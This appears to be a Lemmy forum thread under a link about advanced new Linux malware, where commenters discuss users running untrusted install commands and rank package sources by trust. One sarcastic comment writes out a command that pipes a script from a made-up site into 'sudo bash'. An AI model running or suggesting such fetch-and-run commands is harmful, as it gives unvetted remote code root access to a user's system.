this post was submitted on 14 Jan 2026
198 points (95.4% liked)

Technology

78705 readers
2965 users here now

This is a most excellent place for technology news and articles.

Our Rules

  1. Follow the lemmy.world rules.
  2. Only tech related news or articles.
  3. Be excellent to each other!
  4. Mod approved content bots can post up to 10 articles per day.
  5. Threads asking for personal tech support may be deleted.
  6. Politics threads may be removed.
  7. No memes allowed as posts, OK to post as comments.
  8. Only approved bots from the list below, this includes using AI responses and summaries. To ask if your bot can be added please contact a mod.
  9. Check for duplicates before posting, duplicates may be removed
  10. Accounts 7 days and younger will have their posts automatically removed.

Approved Bots

founded 2 years ago
MODERATORS
L3s@lemmy.world
enu@lemmy.world
technopagan@lemmy.world
L4s@lemmy.world
L3s@hackingne.ws
198
Never-before-seen Linux malware is “far more advanced than typical” (arstechnica.com)
submitted 2 days ago by return2ozma@lemmy.world to c/technology@lemmy.world
43 comments fedilink hide all child comments
you are viewing a single comment's thread
view the rest of the comments
[–] CosmicTurtle0@lemmy.dbzer0.com 110 points 2 days ago (2 children)

As we push more average Windows users to Linux, we need to be prepared for these users to download and run completely untrusted code.

[–] blackn1ght@feddit.uk 81 points 2 days ago (3 children)

Let's be honest, how many current Linux users can trust any code that they run? There's so many guides and instructions where you essentially copy/paste commands to install or configure something that it would be difficult for your average user to verify everything.

[–] kumi@feddit.online 2 points 1 day ago* (last edited 1 day ago)

If you feel overwhelmed by this, an easy rule of thumb is sticking to distro packages of a trusted dist. Ideally ones with long track record, centralized packaging and tiered rollouts.

Roughly,

  • High community trust: Debian, SUSE, Fedora, Ubuntu

  • Depends on the package but at least everything is transparent with some form of process, contributors vetted, and a centralized namespace: Arch, Alpine, Nixpkgs

  • Anything and anyone goes, you are one typo away from malware but hey, at least things get taken down when folks complain: AUR, GitHub, NPM, DockerHub, adding third-party ppa/copr

  • IDGAF: curl | sh

[–] village604@adultswim.fan 2 points 1 day ago

Probably a bunch. But having the ability doesn't mean it's used.

[–] plateee@piefed.social 3 points 1 day ago

Oh you want this cool terminal experience? Just run:

curl https://totally-normal-website.io/installer.sh | sudo bash

[–] kumi@feddit.online 6 points 1 day ago* (last edited 1 day ago) (1 children)

Friends don't tell friends to "Just curl shiny.tool/install | sh" or "Just git clone and docker-compose up".

[–] captain_aggravated@sh.itjust.works 5 points 1 day ago

You know, I have encountered a lot of "just pipe curl into sh" from people who absolutely should know not to do that.